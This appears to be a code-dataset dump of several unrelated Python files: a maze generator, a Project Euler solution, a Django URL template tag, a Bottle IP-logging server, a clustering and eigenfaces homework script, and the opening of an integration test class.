import weira\n from .trees import Tree\n from .progress_display import BlenderProgress\n from .logging_setup import setup_logger\nelse:\n import weira\n from trees import Tree\n from time import sleep\n from logging_setup import setup_logger\n\nlogger = setup_logger(__name__)\n\n\ndef round_avg(x1, x2):\n return round((x1 + x2) / 2)\n\n\ndef avg(x1, x2):\n return (x1 + x2) / 2\n\n\ndef find_all(lst, value):\n return [i for i, a in enumerate(lst) if a == value]\n\n\nclass Maze:\n \"\"\"The wrapper object for storing a maze.\n\n Methods:\n __init__ - Sets up maze, width, and height, then calls make_base_grid to setup grid.\n __len__ - Override for python len().\n make_base_grid - Sets up self.maze with grid based on x and y dimensions.\n get_maze - Returns maze.\n is_path - Returns if space defined by x and y is a path.\n make_path - Makes the space defined by x and y a path.\n make_wall - Makes the space defined by x and y a wall.\n find_touching - (static) Finds the spaces that touch x and y separated by 'dist'.\n exist_test - Checks if ordered pair exists within maze size.\n find_touching_path_dirs - Returns the directions in which there is a path adjacent to space (x, y), separated by given distance.\n find_exist_touching - Finds the spaces that touch x and y separated by 'dist'.\n \"\"\"\n def __init__(self, width, height, walls=True):\n \"\"\"Sets up maze, width, and height, then calls make_base_grid to setup grid.\"\"\"\n self.maze = []\n self.width = width\n self.height = height\n\n self.make_base_grid(walls)\n\n def __len__(self):\n \"\"\"Override for python len().\"\"\"\n return len(self.maze)\n\n def make_base_grid(self, walls):\n \"\"\"Sets up self.maze with grid based on x and y dimensions.\n\n Args:\n walls - make all spaces in the grid walls, False = make all spaces paths\n \"\"\"\n for column in range(0, self.width):\n self.maze.append([])\n for row in range(0, self.height):\n if walls:\n self.maze[column].append(0)\n else:\n self.maze[column].append(1)\n\n def get_maze(self):\n \"\"\"Returns maze.\"\"\"\n return self.maze\n\n def is_path(self, x, y):\n \"\"\"Returns if space defined by x and y is a path.\"\"\"\n return self.maze[x][y]\n\n def make_path(self, x, y):\n \"\"\"Makes the space defined by x and y a path.\"\"\"\n self.maze[x][y] = 1\n\n def make_wall(self, x, y):\n \"\"\"Makes the space defined by x and y a wall.\"\"\"\n self.maze[x][y] = 0\n\n @staticmethod\n def find_touching(x, y, dist=1):\n \"\"\"Finds the spaces that touch x and y separated by 'dist'.\n\n Args:\n x - (int) the x coordinate of the ordered pair to check\n y - (int) the y coordinate of the ordered pair to check\n dist - (int) distance from 'space' to check\n\n ---------------------\n | | | 2 | | |\n ---------------------\n | | | 1 | | |\n ---------------------\n | 2 | 1 | # | 1 | 2 |\n ---------------------\n | | | 1 | | |\n ---------------------\n | | | 2 | | |\n ---------------------\n\n Returns:\n (list of tuples) ordered pairs of touching spaces\n \"\"\"\n return [(x, y + dist), (x - dist, y), (x + dist, y), (x, y - dist)]\n\n def exist_test(self, x, y):\n \"\"\"Checks if ordered pair exists within maze size.\n\n Args:\n x - (int) the x coordinate of the ordered pair to check\n y - (int) the y coordinate of the ordered pair to check\n\n Returns:\n (boolean) exists\n \"\"\"\n exists = False\n # check that x and y are within maze bounds\n if self.width > x >= 0 and self.height > y >= 0:\n exists = True\n\n return exists\n\n def find_touching_path_dirs(self, x, y, dist=1):\n \"\"\"Returns the 
directions in which there is a path adjacent to space (x, y), separated by given distance.\n\n Args:\n x - (int) the x coordinate of space to use as the reference point\n y - (int) the y coordinate of space to use as the reference point\n dist - (int) the distance from the reference to check if the space is a path\n\n Returns:\n (tuple of strings) all directions in which there is an adjacent path, sep. by dist (in order N, W, E, S)\n \"\"\"\n touching = self.find_touching(x, y, dist)\n dirs = ('N', 'W', 'E', 'S')\n directions = []\n for i, t in enumerate(touching):\n # verify existence to avoid IOR Error\n if not self.exist_test(t[0], t[1]):\n continue\n # add the corresponding direction to the list\n if self.is_path(t[0], t[1]):\n directions += dirs[i]\n return directions\n\n def find_exist_touching(self, x, y, dist=1):\n \"\"\"Finds the spaces that touch x and y separated by 'dist'.\n\n Args:\n x - the x coordinate of space to base it off of\n y - the y coordinate of space to base it off of\n dist - distance from 'space' to check\n\n ---------------------\n | | | 2 | | |\n ---------------------\n | | | 1 | | |\n ---------------------\n | 2 | 1 | # | 1 | 2 |\n ---------------------\n | | | 1 | | |\n ---------------------\n | | | 2 | | |\n ---------------------\n\n Returns:\n a list of ordered pairs of touching spaces that exist\n \"\"\"\n directions = [(x, y - dist), (x + dist, y), (x, y + dist), (x - dist, y)]\n\n touching_xy = []\n for d in directions:\n if self.exist_test(d[0], d[1]):\n touching_xy.append(d)\n\n return touching_xy\n\n\nclass OrthogonalMaze:\n \"\"\"Flexible and powerful grid-based maze generation class.\n\n Methods:\n __init__ - Initializes variables, creates maze grid, starts progress report, makes maze, ends progress report.\n make - Makes a maze.\n start_location - Generates random, even x and y values.\n get_directions - Returns a list of the spaces from 4 directions 2 spaces from given ordered pair.\n dir_to_ordered_pair - Returns ordered pair of direction.\n loop_update - Updates progress reports.\n ordered_pair - Returns the ordered pair of passed index.\n limited_paths_check - Returns True if space is neighboring more than max_allowed spaces, False otherwise.\n choose_ind - Chooses index...only a stub.\n paths_only - Filters out all wall spaces from a list of spaces.\n get - Returns maze.\n display - Prints maze to terminal or console window.\n \"\"\"\n\n def __init__(self, debug, width=10, height=10):\n \"\"\"Initializes variables, creates maze grid, starts progress report, makes maze, ends progress report.\"\"\"\n global IN_BLENDER\n self.IN_BLENDER = IN_BLENDER\n\n if not width & 1 or not height & 1:\n logger.critical(\"Even maze dimension(s) w={}, h={}! Will likely crash!\".format(width, height))\n\n self.debug = debug\n self.width = width\n self.height = height\n\n self.maze = Maze(width, height)\n self.cells = []\n self.loops = 0\n self.estimated_loops = int((self.width * self.height * 1.25))\n\n if self.IN_BLENDER:\n self.bldr_prog = BlenderProgress(\"Layout Gen\", self.debug)\n self.bldr_prog.start()\n\n self.make()\n\n if self.IN_BLENDER:\n self.bldr_prog.finish()\n else:\n self.display()\n\n def make(self):\n \"\"\"Makes a maze. 
Only a stub.\"\"\"\n\n # generate random, but even x and y start location\n x, y = self.start_location()\n self.cells.append((x, y))\n self.maze.make_path(x, y)\n\n while self.cells:\n index = self.choose_ind()\n x, y = self.ordered_pair(index)\n\n directions = self.get_directions(x, y)\n directions = self.shuffle_directions(directions)\n for dx, dy in directions:\n\n # check that we're not by more than 1 path cell\n if self.limited_paths_check((dx, dy), 1):\n continue\n\n if self.maze.exist_test(dx, dy) and not self.maze.is_path(dx, dy):\n # space in between b/c we are doing doubles\n self.maze.make_path(round_avg(x, dx), round_avg(y, dy))\n # space (second one)\n self.maze.make_path(dx, dy)\n self.cells.append((dx, dy))\n index = None\n break\n\n # remove from cells list if index has not been found\n if index is not None:\n self.cells.pop(index)\n\n self.loop_update()\n\n def start_location(self):\n \"\"\"Generates random, even x and y values.\"\"\"\n return random.randint(0, int((self.width - 1) / 2)) * 2, random.randint(0, int((self.height - 1) / 2)) * 2\n\n def shuffle_directions(self, directions):\n return random.shuffle(directions)\n\n @staticmethod\n def get_directions(x, y):\n \"\"\"Returns a list of the spaces from 4 directions 2 spaces from given ordered pair.\"\"\"\n return [(x + 2, y), (x - 2, y), (x, y + 2), (x, y - 2)]\n\n @staticmethod\n def dir_to_ordered_pair(x, y, direction, dist=2):\n \"\"\"Returns ordered pair of direction.\"\"\"\n a = {'N': (x, y - dist), 'E': (x + dist, y), 'S': (x, y + dist), 'W': (x - dist, y)}\n try:\n return a[direction]\n except KeyError:\n logger.error(\"Error! Invalid direction!\")\n\n def loop_update(self, sleep_time=0.0):\n \"\"\"Updates progress reports.\"\"\"\n if self.IN_BLENDER:\n self.loops += 1\n progress = self.loops / self.estimated_loops\n self.bldr_prog.update(progress)\n else:\n self.display()\n if sleep_time:\n sleep(sleep_time)\n\n def ordered_pair(self, index):\n \"\"\"Returns the ordered pair of passed index.\"\"\"\n return self.cells[index][0], self.cells[index][1]\n\n def limited_paths_check(self, space, max_allowed):\n \"\"\"Returns True if space is neighboring more than max_allowed spaces, False otherwise.\"\"\"\n return len(self.paths_only(self.maze.find_exist_touching(space[0], space[1]))) > max_allowed\n\n def choose_ind(self):\n \"\"\"Chooses index...only a stub.\"\"\"\n return 0\n\n def paths_only(self, spaces):\n \"\"\"Filters out all wall spaces from a list of spaces.\"\"\"\n\n path_spaces = []\n for space in spaces:\n x, y = space\n if self.maze.is_path(x, y):\n path_spaces.append(space)\n return path_spaces\n\n def get(self):\n \"\"\"Returns maze.\"\"\"\n return self.maze\n\n def display(self, illum_list=()):\n \"\"\"Prints maze to terminal or console window.\"\"\"\n # x-axis labels\n tens_digit = [str([b for b in range(10)][int(a / 10)]) for a in range(self.width)]\n disp = \" \" + \"\".join(tens_digit).replace(\"0\", \" \") + \"\\n\"\n ones_digit = [str([b for b in range(10)][a % 10]) for a in range(self.width)]\n disp += \" \" + \"\".join(ones_digit) + \"\\n\"\n # x-axis arrows\n disp += \" \" + \"v\" * (self.width + 2) + \"\\n\"\n\n for y in range(self.height):\n # y-axis labels and arrows\n disp += \"{:2d}\".format(y) + \" >\"\n for x in range(self.width):\n # illuminated are shown with '$'\n if (x, y) in illum_list:\n disp += \"$\"\n # paths are shown with ' '\n elif self.maze.is_path(x, y):\n disp += \" \"\n # walls are shown with '#'\n else:\n disp += \"\\u2588\"\n # right-hand y-axis arrows and newlines\n 
disp += \"<\\n\"\n\n # bottom x-axis arrows\n disp += \" \" + \"^\" * (self.width + 2)\n print(disp)\n\n\nclass PassageCarverMaze(OrthogonalMaze):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n\nclass GraphTheoryMaze(PassageCarverMaze):\n def __init__(self, bias_direction, bias, **kwargs):\n self.bias_direction = bias_direction\n self.bias = bias\n super().__init__(**kwargs)\n\n def shuffle_directions(self, directions):\n choices = ['X', 'Y']\n if self.bias_direction not in choices:\n self.bias_direction = random.choice(choices)\n\n if self.bias_direction == 'X':\n w_dirs = list(zip(directions, [0, 0, 1, 1]))\n elif self.bias_direction == 'Y':\n w_dirs = list(zip(directions, [1, 1, 0, 0]))\n else:\n w_dirs = list(zip(directions, [1, 1, 1, 1]))\n return weira.weira_shuffle(w_dirs, self.bias)\n\n\nclass BreadthFirstMaze(GraphTheoryMaze):\n def choose_ind(self):\n return 0\n\n\nclass DepthFirstMaze(GraphTheoryMaze):\n def choose_ind(self):\n return len(self.cells) - 1\n\n\nclass PrimsMaze(GraphTheoryMaze):\n def choose_ind(self):\n return random.randint(0, len(self.cells) - 1)\n\n\nclass BinaryTreeMaze(PassageCarverMaze):\n def __init__(self, directions='RANDOM', tileable=False, **kwargs):\n\n # parse 'directions' to make tuple\n if directions == 'NE':\n self.directions = ['N', 'E']\n elif directions == 'NW':\n self.directions = ['N', 'W']\n elif directions == 'SE':\n self.directions = ['S', 'E']\n elif directions == 'SW':\n self.directions = ['S', 'W']\n else:\n possible_dirs = [['N', 'E'], ['N', 'W'], ['S', 'E'], ['S', 'W']]\n self.directions = random.choice(possible_dirs)\n\n self.tileable = tileable\n\n super().__init__(**kwargs)\n\n def make(self):\n # start in top, left corner\n for x in range(self.width)[::2]:\n for y in range(self.height)[::2]:\n\n d = ''\n # this controls how we handle the edges\n if self.tileable:\n self.maze.make_path(x, y)\n d = random.choice(self.directions)\n else:\n temp_directions = []\n\n self.maze.make_path(x, y)\n\n # y-axis\n if y > 0 and 'N' in self.directions:\n temp_directions += 'N'\n elif y < self.height - 1 and 'S' in self.directions:\n temp_directions += 'S'\n\n # x-axis\n if x > 0 and 'W' in self.directions:\n temp_directions += 'W'\n elif x < self.width - 1 and 'E' in self.directions:\n temp_directions += 'E'\n\n # choose direction\n if temp_directions:\n d = random.choice(temp_directions)\n if d:\n nx, ny = self.dir_to_ordered_pair(x, y, d, 1)\n if self.maze.exist_test(nx, ny):\n self.maze.make_path(nx, ny)\n\n self.loop_update()\n\n\nclass SetBasedMaze(OrthogonalMaze):\n def __init__(self, **kwargs):\n self.tree = Tree()\n super().__init__(**kwargs)\n\n def knock_out_wall(self, x1, x2):\n self.maze.make_path(round(avg(x1, x2)), self.y)\n\n\nclass KruskalsMaze(PassageCarverMaze, SetBasedMaze):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def make(self):\n \"\"\"Relies on odd dimensions:\n\n +-------------------+\n | 0 | | 0 | | 0 |\n +---+---+---+---+---+\n | | X | | X | |\n +---+---+---+---+---+\n | 0 | | 0 | | 0 |\n +---+---+---+---+---+\n | | X | | X | |\n +---+---+---+---+---+\n | 0 | | 0 | | 0 |\n +-------------------+\n\n Notes:\n 1. the X's are always walls\n 2. the ' 's are sometimes walls\n 3. 
the 0's are always paths\n\n \"\"\"\n\n # create the tree and carve out the 0's\n self.tree = Tree()\n for x in range(self.width)[::2]:\n for y in range(self.height)[::2]:\n self.tree.new_node((x, y))\n self.maze.make_path(x, y)\n\n # create a list of all the walls\n walls = []\n for y in range(self.height):\n for x in range(self.width)[::2]:\n if y & 1:\n walls.append((x, y))\n else:\n if x + 1 < self.width:\n walls.append((x + 1, y))\n\n random.shuffle(walls)\n\n while walls:\n w = walls.pop()\n # if the wall's y-value is odd, the paths will be up and down\n if w[1] & 1:\n if self.tree.get_root((w[0], w[1] + 1)) != self.tree.get_root((w[0], w[1] - 1)):\n self.maze.make_path(w[0], w[1])\n # parent the roots of the two path spaces to each other\n self.tree.parent(self.tree.get_root((w[0], w[1] + 1)), self.tree.get_root((w[0], w[1] - 1)))\n else:\n if self.tree.get_root((w[0] + 1, w[1])) != self.tree.get_root((w[0] - 1, w[1])):\n self.maze.make_path(w[0], w[1])\n self.tree.parent(self.tree.get_root((w[0] + 1, w[1])), self.tree.get_root((w[0] - 1, w[1])))\n\n self.loop_update()\n\n\nclass EllersMaze(PassageCarverMaze, SetBasedMaze):\n def __init__(self, bias=0.0, **kwargs):\n self.bias = bias\n self.y = 0\n super().__init__(**kwargs)\n\n def make(self):\n # create all nodes we will ever need to use (we only build one row at a time)\n for a in range(self.width)[::2]:\n self.tree.new_node(name=a)\n\n # make all of these paths\n for x in self.tree.get_nodes():\n self.maze.make_path(x, 0)\n\n # loop over every other y-value so if height = 5 we loop: 0, 2, 4 as y\n for y in range(self.height)[::2]:\n self.y = y # update here so we don't have to keep passing it as an arg\n\n # combine sets - use bias\n for node in self.tree.get_nodes():\n neighbor = node + 2\n\n # this must be tried b/c neighbor +2 (so out of range of keys)...dict is\n # unordered so we can't use slicing to skip the last one :(\n try:\n # if they are already the same set type we would introduce a loop\n if self.tree.get_root(node) == self.tree.get_root(neighbor):\n continue\n except KeyError:\n continue\n\n if random.random() > 1 - (1 - self.bias) and y < self.height - 1:\n self.combine_sets(node, neighbor)\n\n self.loop_update()\n\n # drop down sets - use drop_down_chance?\n if y < self.height - 1:\n self.drop_down()\n\n # knock out walls in the bottom row to remove isolated regions\n self.finish_bottom()\n\n def combine_sets(self, x1, x2):\n # self.tree.unparent(x2)\n root = self.tree.get_root(x2)\n self.tree.parent(root, x1)\n\n # knock out wall between on maze\n self.knock_out_wall(x1, x2)\n\n def drop_down(self):\n def drop(x):\n if self.maze.exist_test(x, self.y + 1):\n self.maze.make_path(x, self.y + 1)\n self.maze.make_path(x, self.y + 2)\n return x\n\n dropped = []\n for root in self.tree.get_roots():\n nodes_on_rt = [a for a in self.tree.get_nodes() if self.tree.child_of(a, root)] + [root]\n # drop AT LEAST one from each 'root'...\n for _ in nodes_on_rt:\n dropped.append(drop(random.choice(nodes_on_rt)))\n\n # make the rest become roots\n for leaf in self.tree.get_nodes():\n if leaf not in dropped:\n self.tree.replacement_child_shift_detach(leaf)\n self.maze.make_path(leaf, self.y + 2)\n\n def finish_bottom(self):\n for node in self.tree.get_nodes():\n neighbor = node + 2\n # this must be tried b/c neighbor +2 (so out of range of keys)...dict is\n # unordered so we can't use slicing to skip the last one :(\n try:\n if self.tree.get_root(node) != self.tree.get_root(neighbor):\n self.combine_sets(node, neighbor)\n except 
KeyError:\n continue\n\n\ndef main():\n # BinaryTreeMaze('NW', debug=True, width=33, height=23)\n # DepthFirstMaze(bias_direction='RANDOM', bias=.5, debug=True, width=99, height=45)\n # PrimsMaze(bias_direction='RANDOM', bias=.5, debug=True, width=99, height=45)\n # BreadthFirstMaze(bias_direction='RANDOM', bias=.5, debug=True, width=99, height=45)\n EllersMaze(bias=0.75, debug=True, width=99, height=45)\n # KruskalsMaze(debug=True, width=99, height=45)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ekaj2/UltiMaze","sub_path":"maze_tools.py","file_name":"maze_tools.py","file_ext":"py","file_size_in_byte":21473,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"35805687753","text":"# Task 18 - Python\n# Maximum path sum I\n\nimport math\nimport time\n\ntriangle = [list(map(int, line.split())) for line in open('pe18_data_set.txt').readlines()]\n\ndef path():\n # Dynamic Methods for Bottom-Up\n for row in range(len(triangle) - 1, 0, -1):\n for col in range(0, row):\n triangle[row - 1][col] += max(triangle[row][col], triangle[row][col + 1])\n return triangle[0][0]\n\ndef main():\n time_start = time.time()\n max_route = path()\n\n print(\"Answer: {0} => Calculated in: {1}\".format(max_route, (time.time() - time_start)))\n\nif __name__ == '__main__':\n main()","repo_name":"WillGreen98/Project-Euler","sub_path":"Tasks 1-99/Task 18/Task-18.py","file_name":"Task-18.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43632398770","text":"from django import template\nfrom django.core.urlresolvers import reverse\n\nfrom django_project import settings\n\n\nregister = template.Library()\n\n@register.simple_tag\ndef url_abs(name, *args):\n\t\"\"\"\n\tBasically identical to the built-in url tag, but includes the domain name\n\t\"\"\"\n\tprotocol = settings.PROTOCOL\n\tdomain = settings.DOMAIN\n\turl = reverse(name, args=args)\n\tabs_path = '{}://{}{}'.format(protocol, domain, url)\n\t\n\treturn abs_path\n\n\n","repo_name":"ortegagingrich/inventory-app","sub_path":"django_project/utils/templatetags/url_abs.py","file_name":"url_abs.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7103710551","text":"#!/usr/bin/env python\n\ntry:\n from bottle import Bottle, route, run, request, abort\n ext_deps = True\nexcept ImportError:\n ext_deps = False\nfrom datetime import datetime\nfrom ipaddress import ip_address\nimport argparse\nimport shelve\nimport hmac\nimport sys\nimport traceback\nimport socket\nfrom tools import reverse_lookup, get_ip_address\n\nif not ext_deps:\n sys.stderr.write(\"Missing external dependency: bottle. 
Please install it first.\\n\")\n sys.exit(2)\n\nDATA = None\nSERVER_SECRET = None\nDEBUG = False\n\napp = Bottle()\n\n@app.route('/log')\ndef log():\n try:\n name = request.query.name\n salt = request.query.salt\n auth = request.query.auth\n if not hmac.compare_digest(auth, hmac.new(SERVER_SECRET.encode('utf-8'), salt.encode('utf-8'), digestmod='sha1').hexdigest()):\n raise NameError('Auth code incorrect.')\n messagesig = request.query.messagesig\n clienttime = request.query.clienttime\n host = request.query.host\n hostip = get_ip_address(request.query.hostip)\n reversehost = request.query.reversehost\n clienttime = datetime.strptime(clienttime, \"%Y-%m-%dT%H:%M:%S.%f\")\n servertime = datetime.utcnow()\n ip = get_ip_address(request.remote_addr)\n family = socket.AF_INET if ip.version == 4 else socket.AF_INET6\n reverseclient = reverse_lookup(str(ip), family=family)\n dataset = dict(host=host, reversehost=reversehost, hostip=str(hostip), name=name, salt=salt, messagesig=messagesig, auth=auth, clienttime=clienttime, servertime=servertime, ip=str(ip), reverseclient=reverseclient, type='server')\n DATA[servertime.isoformat()] = dataset\n except Exception as ex:\n if DEBUG:\n tb = traceback.format_exc()\n return {'success': False, 'exception': \"{}: {}\\n{}\".format(type(ex), ex, tb)}\n else:\n return {'success': False, 'exception': \"{}\".format(ex)}\n # customizations of the dataset to be returned to client:\n del dataset['clienttime']\n dataset['servertime'] = servertime.isoformat()\n dataset['ip'] = request.remote_addr\n dataset['hostip'] = request.query.hostip\n return {'success': True, 'data': dataset }\n\ndef make_json_serializable(d):\n \"\"\"\n Make dataset d JSON serializable.\n \"\"\"\n d['clienttime'] = d['clienttime'].isoformat()\n d['servertime'] = d['servertime'].isoformat()\n d['hostip'] = d['hostip']\n d['ip'] = d['ip']\n return d\n\n@app.route('/list/by/')\ndef list_log_entries(grouped):\n if grouped not in ('ip', 'name'): abort(404, 'Requested grouping not supported')\n by_ip = dict()\n for key in DATA:\n d = DATA[key]\n make_json_serializable(d)\n try:\n by_ip[d[grouped]].append(d)\n except KeyError:\n by_ip[d[grouped]] = [d]\n return dict(entries=by_ip)\n\ndef is_ip(ip):\n try:\n ip = ip_address(ip)\n return True\n except ValueError:\n return False\n\n@app.route('/stats')\ndef stats():\n ret = dict()\n last_dates = list()\n unique = {\n 'ipv4_client': set(),\n 'ipv6_client': set(),\n 'reverseclient': set()\n }\n for key in DATA:\n d = DATA[key]\n unique['reverseclient'].add(d['reverseclient'])\n if ip_address(d['ip']).version == 4:\n unique['ipv4_client'].add(d['ip'])\n else:\n unique['ipv6_client'].add(d['ip'])\n last_dates.append((d['servertime'], key))\n for key in unique:\n unique[key] = sorted(list(unique[key]))\n unique[key] = [str(val) for val in unique[key]]\n unique['reverseclient'] = [dom for dom in unique['reverseclient'] if not is_ip(dom)]\n unique['reverseclient'] = ['.'.join(y[::-1]) for y in sorted([dom.split('.')[::-1] for dom in unique['reverseclient']])]\n last_dates.sort(reverse=True)\n last_dates = last_dates[:4]\n last_entries = [make_json_serializable(DATA[last[1]]) for last in last_dates]\n ret['last'] = last_entries\n ret['unique'] = unique\n return ret\n\ndef main():\n\n global SERVER_SECRET, DATA, DEBUG\n\n parser = argparse.ArgumentParser(description='IP Logger Server - Logging the remote IP addresses of trusted clients.')\n parser.add_argument('shelvefile', help='The file to store previous requests in.')\n parser.add_argument('--server-secret', 
metavar='R@Nd0MK3y', help='The secret code of this server.', required=True)\n parser.add_argument('--server-adapter', metavar='wsgiref', default='wsgiref', help='Which server to run this web app with. Depends on 3rd party Python modules. If you need IPv6, try \"cherrypy\".')\n parser.add_argument('--host', metavar='0.0.0.0', default='0.0.0.0', help='The host/IP to bind the server to. Use \"::\" for IPv6.')\n parser.add_argument('--port', metavar=2000, default=2000, type=int, help='The port the server should listen at. Default: 2000.')\n parser.add_argument('--debug', action='store_true', help='Enable debugging mode.')\n\n args = parser.parse_args()\n\n DEBUG = args.debug\n SERVER_SECRET = args.server_secret\n DATA = shelve.open(args.shelvefile)\n print(\"Currently stored entries: {}\".format(len(DATA)))\n \n run(app, server=args.server_adapter, host=args.host, port=args.port, debug=DEBUG)\n \n DATA.close()\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"pklaus/IP-Logger","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5290,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"14447781834","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 16 23:33:43 2017\n\n@author: Kebinder\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport mltools as ml\nimport scipy.linalg\n\niris = np.genfromtxt('data/iris.txt', delimiter=None)\n\nX, Y = iris[:,0:2], iris[:,-1]\n\n# Problem 1: Basics of Clustering\n\n# 1A\nplt.scatter(X[:,0],X[:,1],color='b')\nplt.xlabel('feature x_1')\nplt.ylabel('feature_x_2')\nplt.title('Precluster algorithm graph')\nplt.show()\n\n# 1B\n\nz,c,d = ml.cluster.kmeans(X,5)\nml.plotClassify2D(None, X, z)\nplt.title('K = 5')\nplt.xlabel('feature x_1')\nplt.ylabel('feature_x_2')\nplt.show()\n\nz,c,d = ml.cluster.kmeans(X,20)\nml.plotClassify2D(None, X, z)\nplt.title('K = 20')\nplt.xlabel('feature x_1')\nplt.ylabel('feature_x_2')\nplt.show()\n\n# 1C\n\nz, c = ml.cluster.agglomerative(X, 5, method='min')\nplt.title(\"Agglomerative Single Linkage for K = 5\");\nml.plotClassify2D(None, X, z);\nplt.show()\n\nz, c = ml.cluster.agglomerative(X, 5, method='max')\nplt.title(\"Agglomerative Complete Linkage for K = 5\");\nml.plotClassify2D(None, X, z);\nplt.show()\n\nz, c = ml.cluster.agglomerative(X, 20, method='min')\nplt.title(\"Agglomerative Single Linkage for K = 20\");\nml.plotClassify2D(None, X, z);\nplt.show()\n\nz, c = ml.cluster.agglomerative(X, 20, method='max')\nplt.title(\"Agglomerative Complete Linkage for K = 20\");\nml.plotClassify2D(None, X, z);\nplt.show()\n\n'''\n The difference between k-means and agglomerative clusters is that\nagglomerative clusters are dendograms. If we use minimum distance \nbetween clusters it will produce a minimum spanning tree while a\nmaximum distance will avoid elongated clusters. This is shown\nin the single and complete linkage for each as single linkage has\na few clusters that take up the majority while the rest are small or\nsingle nodes. K-means base each cluster on a center point. The\ninitialization of each center may change how the clusters look. 
\nDistance based or random.\n'''\n\n# Problem 2: Eigenfaces\nX = np.genfromtxt(\"data/faces.txt\", delimiter=None) # load face dataset\nplt.figure()\n# pick a data point i for display\nimg = np.reshape(X[5,:],(24,24)) # convert vectorized data point to 24x24 image patch\nplt.imshow( img.T , cmap=\"gray\") # display image patch; you may have to squint\nplt.show()\n\n# 2A\nmean = np.mean(X)\nX0 = X-mean\n\nprint(\"X0 = \",X0)\n\n#2B\nU, S, V = scipy.linalg.svd(X0, full_matrices=False)\nW = U.dot(np.diag(S))\nprint (U.shape, S.shape, V.shape)\n\n#2C\nmse = []\nfor k in range(1, 11):\n X0hat = W[:, :k].dot(V[:k,:])\n mse.append(np.mean((X0 - X0hat)**2))\n# plot the data\n_, axis = plt.subplots()\naxis.plot(range(1,11), mse, c='red')\naxis.set_xticks(range(1,11))\nplt.show()\n\n#2D and 2E\nK = [5,10,50,100]\nfor k in K:\n X0hat = W[:, :k].dot(V[:k,:])\n f1 = X0hat[5,:]\n f2 = X0hat[6,:]\n img = np.reshape(f1,(24,24))\n plt.imshow(img.T, cmap=\"gray\")\n plt.title(\"Face 1 for K = \" + str(k))\n plt.show()\n img = np.reshape(f2, (24,24))\n plt.imshow(img.T, cmap=\"gray\")\n plt.title(\"Face 2 for K = \" + str(k))\n plt.show()\n ","repo_name":"kebinder/178_HW","sub_path":"HW5/HW5.py","file_name":"HW5.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"39411654332","text":"import os\n\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\n\n\nfrom util import haversine\n\nif __name__ ==\"__main__\":\n home_work_info = pd.read_csv(os.path.join(\"Data\",\"Meta\", \"poi_category.csv\"), index_col= False, header = 0)\n \n valid_user = pd.read_csv(os.path.join(\"Data\",\"Meta\",\"valid_user.csv\"), index_col= None, header = 0)\n valid_user.set_index(\"UID\",inplace = True)\n valid_user.loc[:,'LOCATION'] = [np.nan]* valid_user.shape[0]\n for uid in tqdm(sorted(valid_user.query('VALID == \"VALID\"').index)):\n file = os.path.join(\"Data\", \"Interval\", uid, \"location_stay.csv\")\n if not os.path.exists(file):\n continue\n location = pd.read_csv(file, index_col = False, header = 0)\n location.loc[:,'CATEGORY'] = ['OTHERS'] * location.shape[0]\n location.reset_index(inplace = True)\n category_info = home_work_info.query(\"UID == @uid\")\n for idx, lat,long in location[['index','LAT','LONG']].values:\n for jdx, (poi_lat, poi_long, category) in enumerate(category_info[['LAT','LONG','CATEGORY']].values):\n if haversine((lat, long),(poi_lat,poi_long)) < 75:\n location.loc[idx, 'CATEGORY'] = category\n break\n if len(location[\"CATEGORY\"].unique()) == 1:\n valid_user.loc[uid,'LOCATION'] = f\"Only {location['CATEGORY'].unique()[0]} was found\"\n valid_user.loc[uid,'VALID'] = 'INVALID'\n\n location[['START','END','UTC','READABLE_START','READABLE_END','CATEGORY']]\\\n .to_csv(os.path.join(\"Data\",\"Interval\",uid,\"location.csv\"),index = False)\n location[['START','END','UTC','READABLE_START','READABLE_END','DUT_MS','READABLE_DUT','LAT','LONG','CATEGORY']]\\\n .to_csv(os.path.join(\"Data\",\"Interval\",uid,\"location_stay.csv\"),index = False)\n valid_user.reset_index(inplace = True)\n valid_user.to_csv(os.path.join(\"Data\",\"Meta\",\"valid_user.csv\"), index = False)","repo_name":"Kaist-ICLab/Causal-Inference-Tutorial","sub_path":"Preprocessing/location.py","file_name":"location.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34741152529","text":"from __future__ import division\nfrom 
tests.integration_tests.framework.svc_test_collection import ServiceTestCollection\nfrom requests.cookies import RequestsCookieJar\n\n\n__author__ = 'jsternberg'\n\n\n###################################################################################################\n\n\nclass CoreWebCompanyTestCollection(ServiceTestCollection):\n\n def initialize(self):\n\n self.user_id = 'test@nexusri.com'\n self.source = \"core_tests.web_tests.test_company_page_endpoints.py\"\n self.context = {\"user_id\": self.user_id, \"source\": self.source}\n self.cooks = self.__login_test_user_get_cookies()\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n ##------------------------------------ Private Methods --------------------------------------##\n\n def __login_test_user_get_cookies(self):\n\n params = {\"email\": \"test@nexusri.com\", \"password\": self.config[\"TEST_USER_PASSWORD\"]}\n response = self.web_access.post(self.config[\"SECURITY_LOGIN_URL\"], params)\n assert response.ok\n assert isinstance(response.cookies, RequestsCookieJar)\n return response.cookies\n\n def __add_company(self, company_name):\n data = {\"type\": \"retail_parent\",\n \"ticker\": \"\",\n \"status\": \"operating\",\n \"description\": company_name,\n \"exchange\": \"None\",\n \"closure_confirmation_threshold_days\": 270}\n return self.mds_access.call_add_entity(\"company\", company_name, data, self.context)\n\n def __add_industry(self, industry_name):\n data = {\"industry_name\": 